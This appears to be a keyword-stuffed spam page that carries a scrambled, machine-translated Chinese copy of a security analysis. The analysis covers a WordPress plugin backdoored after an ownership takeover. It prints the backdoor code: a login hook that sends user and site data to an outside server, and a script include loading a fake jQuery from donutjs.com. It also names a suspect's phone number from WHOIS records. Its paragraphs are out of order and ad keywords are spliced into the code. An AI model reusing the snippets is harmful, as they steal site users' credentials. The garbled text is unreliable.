防cc_大株红景天胶囊防高反_怎么防
网络
国内DDoS防御_香港高防IP防护DDoS攻击-寒冰互联
寒冰云联
2021-11-17 16:03

本周我们清理了一个受感染的网站,在wp content/plugins/custom content type manager/

Trac也显示了这个有趣的插件更新(2月19日,最新更改)。它添加了/includes/CCTM_Communicator.php文件,并将此新代码插入插件的index.php。

如果没有用户活动,此脚本还会创建一个额外的管理员用户"支持/support@wordpresscore.com".

好吧,现在我们知道donutjs.com与任何真正的js库都没有任何关系。那么为什么wooranker会包含donutjs.com/jquery.js脚本呢?这绝对不是jQuery。以下是此URL返回的内容:

注册人姓名:Vishnudath Mangilipudi行政州/省:安得拉邦邮政编码:524201行政国家:在管理员电话:+91.8985005295名称服务器:NS1.DIGITALOCEAN.COM名称服务器:NS2.DIGITALOCEAN.COM名称服务器:NS3.DIGITALOCEAN.COM

可能攻击者试图使用被盗的管理员用户名和一些常用密码。这些尝试都是徒劳的,因为该网站使用的插件改变了登录URL。

注册人名称:vishnudath注册国:在注册人电话:+91.8985005295

104.131.98.166–美国纽约市数字Oce

//用户登录时发送插件信息函数\u wp\u login\u eventhandler($user\u login,大规模ddos攻击防御,$user){需要一次('includes/CCTM_Communicator.php');$\u objCCTMCom=新的CCTM\u通讯器();$\u objctmcom->addInfo(数组($user\u login,$user));$\u objctmcom->send_info();}添加动作('wp\u login','wp\u login\u eventhandler',10,2)

每次有人登录WordPress网站时,该代码都会将有关网站和用户的信息发送到wooranker的服务器(wordpresscore.com)。虽然用户数据不包含纯文本形式的用户密码,但它足以使用安装的后门CCTM插件编译站点列表。当插件被激活时,也会发送类似的信息。

为网站提供后门盗取网站用户的凭据。

此外,2016年2月5日,wooranker也被添加为Postie插件的所有者。从那时起,posite插件有很多合法的变化。所有这些都是由它的原作者——韦尼亚伦(WayneAllen)犯下的。因此,在本案中,新所有者是在原作者同意的情况下添加的。令人费解,不是吗?我对此有一个理论。在我与大家分享之前,让我们回到恶意的CCTM插件更新,看看wooranker如何使用它来攻击网站。

还有一个小改动。wooranker在获得插件所有权后改变的第一件事是在includes/CCTM.php中添加了一些donutjs。

虽然CCTM_通信器确实窃取了用户信息,但它缺少用户密码。为了解决这个问题,wp-options.php"修补"了三个核心文件,这些文件使用纯文本形式的用户密码:

在SweetCaptcha传奇的结尾,我们发出警告:

这是另一个跟踪脚本,可向推荐者报告hxxps://donutjs .com/jquery js.php.

为什么有人想要这些推荐人?答案是,他们对将此脚本注入易受攻击的站点的人很有用-推荐者将向他们提供他们可以攻击的站点的地址。

新插件所有者

DonutJS

看起来只是另一个JavaScript库,对吗?很多插件都能做到这一点。然而,有一点值得怀疑:

最新更改之一于2016年2月18日添加了auto-update.php文件。在这次更新中,网站ddos防御,"wooranker"做了一个更改,并添加了以下消息:"新所有者的小tweeks"(保留原始语法)。

2月28日,来自104.131.27.120(数字海洋)的人试图使用一些Python脚本("Python请求/2.2.1 CPython/2.7.6 Linux/3.13.0-79-generic")登录WordPress。

没有发现其他新功能/修复的bug,因此很难说它是如何通过插件目录中的审查的。

插件似乎已更改所有者!事实上,在上面的屏幕截图中,你可以看到两周前该插件仍在被"Fireoftocks"更新。他们最近的一项更改被描述为"将wooranker添加到自述文件"。之后,只有wooranker更新了插件。

如果以上是真的,那么wooranker应该控制Donutjs。通用域名格式。看来是这样的。我怎么知道?与其他黑客不同,这家伙没有花太多精力(如果有的话)隐藏他的身份。

wp_enqueue_脚本('donutjs','//donutjs.com/jquery.js');

创建日期:2015-11-23

Wooranker+WordPresscore+Donutjs=…